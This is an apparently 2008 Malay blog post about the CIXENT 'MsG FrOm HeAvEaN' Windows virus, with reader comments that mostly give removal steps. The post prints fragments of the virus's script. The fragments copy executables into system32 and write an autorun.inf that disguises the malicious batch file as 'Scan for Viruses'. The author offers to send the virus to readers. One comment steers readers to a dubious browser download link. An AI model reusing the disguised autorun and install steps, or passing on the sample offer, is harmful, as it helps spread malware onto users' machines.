Mesej From Heavean Virus !

Masih ingat dengan artikel sajak dari Heavean ? Sebenarnya ada cerita buruk disebalik sajak yang indah itu.Agak-agak anda apa cerita buruk yang saya maksudkan . Sebenarnya mesej from heavean adalah sejenis virus yang tergolong dalam kategori trojan , spyware mengikut pemerhatian saya.Kisah benar disebalik mesej from heavean

“Pada satu hari seorang kawan saya memberitahu komputer dia keluar satu mesej “Jeng ! Jeng ! Jeng ! Jeng” sebelum login ke windows.Saya tanya dia ” apa mesej yang keluar ?.Beliau menjawab mesej Jen ! Jeng ! Jeng lagi.”

Untuk lebih jelas saya pergi berjumpa beliau dan melihat sendiri mesej yang dimaksudkan.Setelah melihat komputer tersebut didapati komputer tersebut di serang sejenis virus.Saya sendiri tidak mengetahui nama virus tersebut.Mengikut permerhatian saya terdapat 3 identiti yang terselah pada virus tersebut :

  • CIXENT Corp [CIXENT.V3-Force.LovePart.Small.vb.
  • Restrict By RoMeO A.K.A ILLS.
  • MsG FrOm HeAvEaN.
  • Jeng-Jeng ( nama yang saya beri).


    • Kesan daripada virus ini akan menyebabkan system registry tidak boleh di akses , disable task manager , control panel hilang , run hilang , search hilang , akan keluar mesej from heavean dalam bentuk command prompt , icon-icon yang terdapat taskbar hilang , nama drive akan ditukar kepada RoMeO A.K.A ILLS [CIXENT]. Cara virus ini beroperasi ia akan create satu foldernya sendiri dalam drive C yang akan di hidden.Folder tersebut mengadungi file script-script yang mengubah system windows.Yang menjadi masalah jika anda ingin view file atau folder yang hidden tidak akan dibenarkan.Buat masa sekarang saya belum dapat menyelesaikan masalah ini.Saya ada membaca dalam forum Kaspersky cara untuk mengatasinya namun masih tidak berjaya.Kalau anda ada cara untuk mengatasinya sila tinggalkan komen.

    Antara Screenshot Bila Terkena Virus Jeng!Jeng!Jeng
    welcome note virus jeng
    mesej from heavean

    Antara Kod atau Script Utama Virus Ini.
    alias pathfinder {
    write -c setupNT\pathfinder.bat @echo off
    write setupNT\pathfinder.bat if exist c:\windows\system32\V3-Force.exe goto skip
    write setupNT\pathfinder.bat if exist c:\windows\system32\remote.ini erase /f /q c:\windows\system32\remote.ini
    write setupNT\pathfinder.bat xcopy /Y /h /r /q hell\RoMeO.exe c:\windows\system32
    write setupNT\pathfinder.bat xcopy /Y /h /r /q hell\CipapLu.exe c:\windows\system32
    write setupNT\pathfinder.bat xcopy /Y /h /r /q hell\mirc.ini c:\windows\system32
    write setupNT\pathfinder.bat ren c:\windows\system32\RoMeO.exe V3-Force.exe
    write setupNT\pathfinder.bat start c:\windows\system32\V3-Force.exe
    write setupNT\pathfinder.bat :skip
    write setupNT\pathfinder.bat exit

    alias autorun {
    write -c setupNT\autorun.inf [Autorun]
    write setupNT\autorun.inf open=FuCkiNG.bat
    write setupNT\autorun.inf shellexecute=fucking.bat
    write setupNT\autorun.inf shell\Auto\command=fucking.bat
    write setupNT\autorun.inf label=
    write setupNT\autorun.inf Shell\Option1=Scan for Viruses
    write setupNT\autorun.inf Shell\Option1\Command=FuCkiNG.bat
    write setupNT\autorun.inf Shell\Option2=Scan with AVG
    write setupNT\autorun.inf Shell\Option2\Command=FuCkiNG.bat

    p/s : Khabar angin menceritakan virus ini dicipta oleh salah seorang pelajar UiTM.Betul atau tidak saya belum pasti.Jika anda ingin mencuba virus ini boleh hubungi saya untuk mendapatkannya.

    Popularity: 22% [?]

    Share and Enjoy:
    • Digg
    • del.icio.us
    • Facebook
    • Mixx
    • Google
    • Live
    • Technorati
    • TwitThis
    • NewsVine
    • YahooMyWeb
    • Furl
    • Netvouz

    This entry was posted on Wednesday, February 20th, 2008 at 12:58 pm and is filed under Virus Komputer. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

    40 Responses to “Mesej From Heavean Virus !”

    1. melayubuntu On February 20th, 2008 at 4:08 pm

      wah..dah bersalin kulit…bagus2….bg putih lebih formal =)

      melayubuntu’s last blog post..Linux dan Open Source terpinggir : Sumpahan apabila ia percuma?

      [Reply]

    2. Budhuman On February 20th, 2008 at 7:48 pm

      Removing CIXENT Corp
      OOo camginih nk remove CIXENT.V3.Force.LovePart.Small.vb nih.

      Mula2 ngko kna pkai browser ganaih sekali abad ini yakni:
      1.Download Google recommend Web browserFor more safe and stay far away virus, http://www.oral8.net/firefox/firefox.htm;

      2.Ko carik antiv khas untuk virii tu AVENGER

      download avenger: http://swandog46.geekstogo.com/avenger.zip
      unpack and execute, choose input script manually, press the magnifier and input:
      Files to delete:
      C:\WINDOWS\system32\V3-Force.exe
      C:\WINDOWS\system32\cipaplu.exe
      C:\WINDOWS\system32\mycaption.reg
      C:\WINDOWS\system32\butuhlu.bat
      C:\WINDOWS\system32\forattrib.bat
      C:\WINDOWS\system32\makedir.bat

      press done and press the green lamp button, confirm the reboot. after the reboot delete the following registry key: HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\

      CIXENT.V3.Force.LovePart.Small.vb Description:

      CIXENT Corp [CIXENT.V3.Force.LovePart.Small.vb] virus

      - copied V3-Force.exe in system32 folder..
      - blocked all administration task
      - popup with Jeng!!!Jeng!!!Jeng!!!Jeng!!!Jeng!!!Jeng!!!Jeng!!! x100 words during startup
      etc.

      [Reply]

    3. Budhuman On February 20th, 2008 at 7:50 pm

      Tp dia punya puisi awek cantekk wooo… terpegun rasa.. hak hak heheheh…

      [Reply]

    4. MakLaN On February 21st, 2008 at 12:11 am

      FuCkiNG.bat?
      entah ble mase sesat dlm pendrive aku.
      tapi ianya tak dapat menjahanamkan Ubuntuku :)
      MakLaN’s last blog post..Negara Ini (1)

      [Reply]

    5. hafez On February 21st, 2008 at 6:11 am

      Dahsyat juga penangan virus ni yer….

      hafez’s last blog post..Minyak Soya Vs. Minyak Sawit

      [Reply]

    6. CypherHackz On February 21st, 2008 at 8:48 am

      Untuk dapatkan kembali registry, folder options, etc, kau carik software Remove Restriction Tool.

      CypherHackz’s last blog post..Hadiah birthday aku, Kaspersky Internet Security

      [Reply]

    7. Kisah Sedih Lagi Menyedihkan On February 21st, 2008 at 8:56 am

      [...] yang dipaparkan apabila komputer anda telah dijangkiti virus MsG FrOm HeAvEaN. Virus ini menurut kita, merupakan sejenis virus daripada kategori trojan spyware yang boleh melumpuhkan operasi sistem [...]

    8. Shueqry On February 21st, 2008 at 10:20 am

      Salam, blog yang hebat!

      Saya juga meminati virus dan program antivirus. Tak sangka ada blog ni. Thank You..

      -Shueqry-

      Shueqry’s last blog post..10 Tips Kejayaan Donald Trump - Part 9

      [Reply]

    9. alFarabius On February 21st, 2008 at 10:30 am

      Peh…dasyat tu…virus pun pandai bersajak…thanx 4 da info…thanx 4 da tips Budhuman

      alFarabius’s last blog post..Mentaliti Graduan IT selepas Tamat Belajar - Kerja atau Sambung Belajar?

      [Reply]

    10. shadowX_19 On February 21st, 2008 at 1:50 pm

      erm.. tak pernah lagi aku kene virus ni sbb aku sorg je yg pakai pc n internet kat umah berbanding kalo aku dok kat kolej n poli dulu. mmg besepah virus.

      [Reply]

    11. stupidfox_91 On February 21st, 2008 at 9:10 pm

      ni mesti mat jiwang yang baru clash ngan awek buat virus ni..
      kui3..

      [Reply]

    12. kita On February 21st, 2008 at 11:02 pm

      antivirus dapat clean virus ini..yang masalahnya kita kena repair sendiri ler kerosakan windows.Kena guna tools…nanti saya akan kongsi tools yang diperlukan.

      kita’s last blog post..Mesej From Heavean Virus !

      [Reply]

    13. Muhammad Khairul On February 22nd, 2008 at 1:53 pm

      waa, kongsiblog dah bersalin kulit ye…
      nice look ^^

      Muhammad Khairul’s last blog post..Betapa Pentingnya Backup!

      [Reply]

    14. kucau On February 22nd, 2008 at 11:54 pm

      wehh. send virus body kat aku maa. guna sdfix bleh clear bende nie and lepas tuh kene fix yg message login tuh guna dial-a-fix. virus nie yg tulis budak kat forum putera la. patutnya failed virus, tapi bleh tahan aa

      [Reply]

    15. shadowX_19 On February 24th, 2008 at 2:45 am

      ade cara nak ilangkan ke?

      [Reply]

    16. kita On February 24th, 2008 at 9:20 am

      boleh baca komen yang budhuman cara untuk settlekan..kalau guna antivirus kasperky boleh remove n kena repair sendiri kerosakan tersebut dalam system registry

      kita’s last blog post..Mesej From Heavean Virus !

      [Reply]

    17. am On February 24th, 2008 at 10:40 am

      apalah bebudak ni baru pandai sikit dah sibuk nak buat virus sendiri… menyusahkan orang betul…

      am’s last blog post..Genuine Kan XP Anda

      [Reply]

    18. 2 Tag Serentak | Blog Konsep Terbuka - Open Blog Concept On February 24th, 2008 at 12:03 pm

      [...] Knizam Kuasadua Kita [...]

    19. May On February 25th, 2008 at 8:46 pm

      Yahooooo…..akhirnya ak berjaya clean virus ni…ikut aje step yg Budhuman bg.Lg satu utk remove jeng!! x100,pergi ke registry editor (regedit), ambik edit, find, taip aje cixent corp, n lpas jmpe registry key tu, buang aje registry key tu…klu x silap ade 2 registry key…Lpas tu restart blik system…time welcome wndows tu, gerenti jeng!! x100 tu x kuar dh…

      [Reply]

    20. May On February 25th, 2008 at 8:48 pm

      Ak gune antivirus kaspersky 7 utk detect virus ni…

      [Reply]

    21. Walkman On February 26th, 2008 at 9:13 pm

      Virus jiwang neh bleh didetect ngn antivirus biasa. Janji kena update!

      [Reply]

    22. karachi On February 29th, 2008 at 4:33 pm

      Kat ner nak dapatkan tempat untuk buka registry key yg nak dibuang? control panel and ,macam@ lagi dihalang untuk buka. 1 part aku dah hilagkan tapi yang jeng2 and nama drive masih ada.tq

      [Reply]

    23. samugr On February 29th, 2008 at 4:41 pm

      macam maner nak buang bende tuu.. tak leh pon….

      [Reply]

    24. maniack On March 1st, 2008 at 4:30 pm

      sesiape yg masih lagi mengalami masalh virus ni boleh masuk kat sini >> http://maniack.890m.com/wordpress/?p=40 untuk donlod removal dan analisis utk virus ni

      [Reply]

    25. samugr On March 2nd, 2008 at 1:16 pm

      CANTEK AH.. DAH ILANG PON SUME HAHAH….. TQ x100

      [Reply]

    26. Po On March 3rd, 2008 at 4:55 pm

      ni org m’sia buat virus ni.. haha..

      [Reply]

    27. geek_commomdore64 On March 24th, 2008 at 3:35 pm

      laa org kt sini kene attack dah…..asskum…aku br je kat sini…aku tau web ni pun dr geek team aku…asal MsG from HeAveN 2 dr aku punya anak buah….nk lawan toke kiranya…aku mewakili si pereka batch 2 mntak maap la…dia putus cinta la…kekasih di tebuk tupai…nk jadi cerita.. si pereka 2 nk balas dendam kat tupai 2 dgn bunuh laptoop si tupai…disuruhnye anak buahnya sebarkan kat latop tupai…tp si anak buah 2 salah guna pegi sebar ke merata…satu room aku kena jangkitan…klu nk tau pegi kat…ahh slesai la sendiri…mudah je…

      [Reply]

    28. maniack On March 25th, 2008 at 8:05 pm

      o0o.. begitu ceritenye.. patutlh msg dier mcm org putus chenta je..

      [Reply]

    29. obedrive On March 28th, 2008 at 1:26 pm

      aku knal mamat yg buat ni.die tension sbb clash ngan awek die bdk poli.seb baik die bg command nk buang.tp dier nk upgrade plak.chekout command utk vbs

      [Reply]

    30. obedrive On March 28th, 2008 at 1:31 pm

      lagi satu virus kamikaze kit.virus jnis pe ni?MBR ke?apsal bios aku jd blur ngan transparent siap ade gif kucing lg.tlg2

      [Reply]

    31. geek_commomdore64 On March 29th, 2008 at 6:01 pm

      utk remove virus ni….kau org kene ada (utk memudahkan delete) tune up utilities 2007 atau 2008… kau pegi kat registry editor manager dlm tune up tu dan tekan search….cari fail ni

      C:\WINDOWS\system32\V3-Force.exe
      C:\WINDOWS\system32\cipaplu.exe
      C:\WINDOWS\system32\mycaption.reg
      C:\WINDOWS\system32\butuhlu.bat
      C:\WINDOWS\system32\forattrib.bat
      C:\WINDOWS\system32\makedir.bat

      pas tu delete laa..
      cari yg ni plak

      HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\

      CIXENT.V3.Force.LovePart.Small.vb Description:

      CIXENT Corp [CIXENT.V3.Force.LovePart.Small.vb] virus

      delete ini benda …reboot pc anda…
      kalau nk repair task manager danlain2 yg di sekat tu kena guna..

      Remove Restriction Tool…bye

      [Reply]

    32. RoMeO A.K.A ILLS On April 3rd, 2008 at 9:25 pm

      Woi!! X payah nak reka2 crite laa… Macam2… Tupai laa.. tebuk laa.. anak buah laa.. hape laa…
      Korang x tau kepale ekor criter x payah nak sebar khabar angin mengarut2.. Bikin gua panas jee… Wa cau Lu… tunggu CIXENT V4-Force plak… Grrrr…

      [Reply]

    33. RoMeO A.K.A ILLS On April 4th, 2008 at 9:22 pm

      Woi!!!.. Dah r tu.. x payah nak reka2 crite.. Tebuk tupai laaa.. anak buah laaa… balas dendam laa… EEeee!!! Mengarut betul!!.. Kalau x tahu kepala ekor cerita sbenar x payah nak buat crite sendiri.. Bikin gua panas jeee!!! k r.. wa cau lu… tunggu CIXENT V4-Force….

      [Reply]

    34. maniack On April 5th, 2008 at 11:58 am

      keskeskes.. kalu dh ader v4 jgn lupe hantar aku sample dier

      [Reply]

    35. Izuman On April 8th, 2008 at 11:26 am

      sial 2 kali dah aku dah kena virus ni.tension gila.terima kasih maniack.ilang dah virus tu.simple je buang :D

      [Reply]

    36. izani On April 13th, 2008 at 9:20 pm

      aku dah dpt buang virus sial nie tp drive c dan d tetap ada nama romeo lg,mcm mane nk ilangkan?

      [Reply]

    37. RoMeO A.K.A ILLS On April 13th, 2008 at 11:20 pm

      V4-Force x pakai BATCH…

      [Reply]

    38. Izuman On April 21st, 2008 at 1:36 am

      izani kau cuba klik kat drive c lepas tu pilih rename lepas tu padam .kemuadian biar dia ruang tu kosong dan klik.lepas tu jadi normal balik.drive D pun sama gak.Aku buat ok ja.

      [Reply]

    39. mr_qai On June 26th, 2008 at 11:54 am

      hemm..saya nak minta awak send virus tuh kat emel saya..saya nak test n try get a solution..

      [Reply]

    40. zam On September 16th, 2008 at 3:10 pm

      saya pun nak sample virus ni jga..nak wat kajian sikit..sape2 leh bagi ??? plz..

      [Reply]

    Leave a Reply